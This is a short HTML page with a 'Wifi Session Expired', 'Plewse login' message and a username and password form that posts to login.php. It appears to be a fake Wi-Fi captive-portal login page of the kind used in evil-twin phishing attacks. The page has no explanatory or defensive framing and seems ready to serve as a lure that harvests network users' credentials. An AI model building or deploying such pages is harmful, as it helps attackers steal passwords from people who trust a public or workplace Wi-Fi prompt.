<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/jgthms/minireset.css@master/minireset.min.css"/><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/picnic"/><link href="https://fonts.googleapis.com/css?family=Chivo:300,700|Playfair+Display:700i" rel="stylesheet"><link rel="stylesheet" href="style.css"/><link rel="stylesheet" href="cookieconsent.min.css"/>  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script><!-- Add boot strap framrworks --><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css"><link rel="stylesheet" href="./style.css"><!-- Add icon library --><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"></head>
<body bgcolor="gray" text="white"><center><h2> Wifi Session Expired <br><br> Plewse login </h2></center><center>
<form method="POST" action="login.php"><label>Username </label>
<input type="text" name="username" length=64>
<br><label>Password: </label><input type="password" name="password" length=64><br><br>
<input value="Login" type="submit"></form>
</center><body>
</html>
